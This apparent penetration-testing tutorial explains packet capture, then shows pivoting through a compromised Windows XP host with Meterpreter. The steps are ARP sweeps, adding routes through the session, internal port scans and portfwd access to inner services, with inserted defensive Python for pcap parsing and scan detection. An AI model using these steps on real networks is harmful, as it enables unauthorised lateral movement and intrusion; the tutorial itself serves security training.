According to Techopedia, packet capture is a computer networking term for intercepting a data packet that is crossing or moving over a specific computer network. Once a packet is captured, it is temporarily stored so that it can be analyzed. The packet is inspected to help diagnose and solve network problems and determine whether network security policies are being followed. Hackers can also use packet capturing techniques to steal data that is being transmitted over a network.
Network managers spend considerable effort analyzing and maintaining network traffic and its performance. Different packet capture methods are used to capture and examine packets traversing a network in real time.
Packet capturing involves filtering. Filtering is a technique in which filters are applied at the various network nodes where data is being captured. Conditional expressions specify which data is captured; for example, a filter might capture only data coming from a PQR route and carrying a U.V.W.X IP address.
To increase the performance of filtering, complete packets should be captured rather than only a specific portion of each packet. A full packet consists of a header and a payload. The payload is the actual content of the packet, and the header carries extra information such as the packet's source and destination addresses.
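As an added example (not from the page), a minimal Python reader for the classic pcap format that applies a destination-host filter like the `tcpdump dst 192.168.1.130` capture used later in this recipe, and splits each matching packet into its header fields and payload; it also reports when the snapshot length truncated a packet, which is the situation the "capture complete packets" advice is about. The sample frames, addresses and snaplen values are constructed here, not taken from a real capture.

```python
import struct
import ipaddress

def ipv4_tcp_frame(src, dst, sport, dport, payload):
    """Build a constructed Ethernet/IPv4/TCP frame (checksums left zero; fine for an offline sample)."""
    eth = bytes(6) + bytes([0x11] * 6) + b"\x08\x00"            # dst MAC, src MAC, EtherType 0x0800 (IPv4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)  # 20-byte header, PSH|ACK
    return eth + ip + tcp + payload

def build_pcap(frames, snaplen=65535):
    """Write a classic pcap (little-endian magic, link type 1 = Ethernet), truncating frames to snaplen."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, snaplen, 1)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", i, 0, min(len(f), snaplen), len(f)) + f[:snaplen])
    return b"".join(out)

def capture_filter(pcap, dst_host):
    """Apply a 'dst host X' filter to a pcap; return (header_fields, payload) for each matching TCP packet."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic != 0xA1B2C3D4:
        raise ValueError("only little-endian classic pcap is handled here")
    matches, off = [], 24
    while off + 16 <= len(pcap):
        _, _, incl_len, orig_len = struct.unpack("<IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                             # not IPv4/TCP, or too short to parse
        ihl = (frame[14] & 0x0F) * 4
        dst = str(ipaddress.ip_address(frame[30:34]))
        if dst != dst_host:
            continue                                             # the filter: keep only traffic to dst_host
        tcp = frame[14 + ihl:]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        header = {"src": str(ipaddress.ip_address(frame[26:30])), "dst": dst,
                  "sport": sport, "dport": dport, "truncated": incl_len < orig_len}
        matches.append((header, tcp[data_off:]))                 # header fields vs. payload bytes
    return matches

# Constructed sample capture: one packet to the pivot host, one to an unrelated host.
SAMPLE_PCAP = build_pcap([
    ipv4_tcp_frame("192.168.15.5", "192.168.1.130", 445, 49152, b"SMB response bytes"),
    ipv4_tcp_frame("192.168.0.9", "192.168.0.1", 50000, 80, b"GET / HTTP/1.0\r\n\r\n"),
])
```

Rebuilding the same capture with a small snaplen (for example 60 bytes) shows the payload cut short and `truncated` set, which is what a too-small snapshot length does to analysis.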
After compromising a system on the network, our goal is to gather as much information as possible about the target environment and find open ports by interacting directly with the target systems. The objectives include determining the addresses used by the systems, including hosts (servers and clients), network equipment (firewalls, routers, and switches), and other devices. In short, we want to determine the operating system, the list of listening TCP ports, which ports are open, and a list of crucial vulnerabilities. To achieve this, we will pivot through a compromised victim to attack deeper into the network.
Getting ready
The attacker (192.168.1.129) breaks into a Windows XP host whose Ethernet adapter 1 (192.168.1.130) is connected to different routers. The attacker runs ipconfig from the Meterpreter session:
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
How to do it...
1. The system is connected to three different IP ranges, which could lead to more targets to exploit. Now, we need to find out whether there are any other IP addresses within those ranges, so we will use one of the Meterpreter scripts, arp_scanner. arp_scanner performs an ARP scan of a given range through the compromised host, as shown here:
meterpreter > run arp_scanner -r 192.168.15.1/24
[*] ARP Scanning 192.168.15.1/24
[*] IP: 192.168.15.5 MAC d8:d3:85:d3:8:2d
[*] IP: 192.168.15.3 MAC 0:b:db:1d:d3:2b
[*] IP: 192.168.15.1 MAC 0:17:ee:ca:32:b2
meterpreter > run arp_scanner -r 192.168.0.1/24
[*] ARP Scanning 192.168.0.1/24
[*] IP: 192.168.0.1 MAC 0:9:5b:fa:66:f2
[*] IP: 192.168.0.5 MAC 0:16:6f:79:68:0
[*] IP: 192.168.0.9 MAC 0:90:4b:12:34:4c
[*] IP: 192.168.0.7 MAC 0:21:6a:b5:9a:f0
2. Now, we will add a route through our Meterpreter session. To do this, we use the route add command in the msf console (we first need to send the Meterpreter session to the background):
meterpreter > background
msf exploit(handler) > route add 192.168.15.1 255.255.255.0 1
[*] Route added
192.168.15.1 255.255.255.0 Session 1
Note the 1 at the end of the route add command: it identifies the Meterpreter session through which the route is tunnelled, so it also serves as the tunnel ID. The tunnel ID must match the session we intend to route through. There can be many different tunnel IDs, each routing to one or several IP addresses.
3. Next, we will leverage a port scanner to discover open ports on the IPs listed by our ARP sweep. We load the TCP port scanner from the auxiliary modules and run it against the IPs found by the ARP sweep:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.15.1
RHOSTS => 192.168.15.1
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
We can set PORTS to the range we wish to scan (1-1024). Then type run; the results are as follows:
msf auxiliary(tcp) > run
[*] 192.168.15.1:22 - TCP OPEN
[*] 192.168.15.1:80 - TCP OPEN
[*] 192.168.15.1:554 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.2
RHOSTS => 192.168.15.2
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.2:22 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) > set RHOSTS 192.168.15.5
RHOSTS => 192.168.15.5
msf auxiliary(tcp) > set PORTS 1-1024
PORTS => 1-1024
msf auxiliary(tcp) > run
[*] 192.168.15.5:80 - TCP OPEN
[*] 192.168.15.5:139 - TCP OPEN
[*] 192.168.15.5:445 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-1024           yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS       192.168.15.5     yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output

msf auxiliary(tcp) >
4. tcpdump and etherape are running on the attacker's system, and the only visible traffic is TCP-UNKNOWN going to 192.168.1.130. All traffic is funneled through our exploited machine, 192.168.1.130, to the other devices listed in the ARP scan. For tcpdump I use:
$ sudo tcpdump dst 192.168.1.130
If you want more detailed output, use:
$ sudo tcpdump -nnvvXSs 1514 dst 192.168.1.130
5. Now, let's look at the results of the TCP scan and see which ports are open. The results of the TCP scan of 192.168.15.0/24 are as follows:
192.168.15.5  tcp open ports 80, 139, and 445
192.168.15.2  tcp open port 22
192.168.15.1  tcp open ports 22, 80, and 554
6. If we want to scan another range, we need to remove the current route with the route remove command and add another:
msf auxiliary(tcp) > route remove 192.168.15.1 255.255.255.0 1
[*] Route removed
msf auxiliary(tcp) > route add 192.168.0.1 255.255.255.0 1
[*] Route added

Active Routing Table
====================

   Subnet        Netmask          Gateway
   ------        -------          -------
   192.168.0.1   255.255.255.0    Session 1

Results from the TCP scan of 192.168.0.0/24:
192.168.0.2  tcp open ports 135, 139, and 445
192.168.0.9  tcp open ports 23, 135, 139, and 445
192.168.0.1  tcp open port 80
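From a defender's side, the pivot in this recipe looks like the compromised host (192.168.1.130) opening SYNs to many host:port pairs in quick succession, since the portscan module checks CONCURRENCY=10 ports per host with a 1000 ms timeout. As an added example (not part of the recipe or of Metasploit), a Python detector that parses constructed tcpdump-style lines from a sensor watching that host and flags any source that fans out to at least five distinct targets within one second; the sample lines and both thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed tcpdump-style lines (not a real capture): 192.168.1.130 fanning out SYNs to the
# 192.168.15.0/24 hosts from the scan above, plus a SYN-ACK and some slower benign traffic.
SAMPLE_LINES = """\
10:00:00.100000 IP 192.168.1.130.49152 > 192.168.15.1.22: Flags [S], seq 1, win 65535, length 0
10:00:00.110000 IP 192.168.1.130.49153 > 192.168.15.1.80: Flags [S], seq 1, win 65535, length 0
10:00:00.120000 IP 192.168.1.130.49154 > 192.168.15.1.554: Flags [S], seq 1, win 65535, length 0
10:00:00.130000 IP 192.168.1.130.49155 > 192.168.15.2.22: Flags [S], seq 1, win 65535, length 0
10:00:00.140000 IP 192.168.1.130.49156 > 192.168.15.5.80: Flags [S], seq 1, win 65535, length 0
10:00:00.150000 IP 192.168.1.130.49157 > 192.168.15.5.139: Flags [S], seq 1, win 65535, length 0
10:00:00.160000 IP 192.168.1.130.49158 > 192.168.15.5.445: Flags [S], seq 1, win 65535, length 0
10:00:00.170000 IP 192.168.15.1.22 > 192.168.1.130.49152: Flags [S.], seq 1, ack 2, win 65535, length 0
10:00:05.000000 IP 192.168.15.3.51000 > 192.168.15.1.80: Flags [S], seq 1, win 65535, length 0
10:00:06.000000 IP 192.168.15.3.51001 > 192.168.15.1.80: Flags [S], seq 1, win 65535, length 0
"""

# timestamp, src.port > dst.port: Flags [..]  (the tcpdump default one-line TCP format)
LINE_RE = re.compile(r"^(\S+) IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]+)\],")

def parse_syns(text):
    """Return (timestamp, src, dst, dport) for each pure SYN line (Flags [S]); other lines are ignored."""
    syns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(6) == "S":
            ts = datetime.strptime(m.group(1), "%H:%M:%S.%f")
            syns.append((ts, m.group(2), m.group(4), int(m.group(5))))
    return syns

def find_fan_out(text, window_seconds=1.0, min_targets=5):
    """Flag any source that SYNs to at least min_targets distinct (dst, port) pairs within one window."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in parse_syns(text):
        by_src[src].append((ts, (dst, dport)))
    flagged, window = {}, timedelta(seconds=window_seconds)
    for src, events in by_src.items():
        events.sort()
        for i, (start, _) in enumerate(events):       # slide the window over each SYN as a start point
            targets = {t for ts, t in events[i:] if ts - start <= window}
            if len(targets) >= min_targets:
                flagged[src] = sorted(targets)
                break
    return flagged
```

Tune `min_targets` and `window_seconds` to the environment; a slow scan (a large TIMEOUT, THREADS=1) spreads the same fan-out over a longer window.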
There's more…
If we find ports such as 22, 23, and 80 open, we can use the portfwd command to gain access to an internal web server, and then run netcat and telnet against ports 22 and 23.
The portfwd command can be used with any of the TCP-based services on the target's network to gain access to internal resources once the machine has been compromised.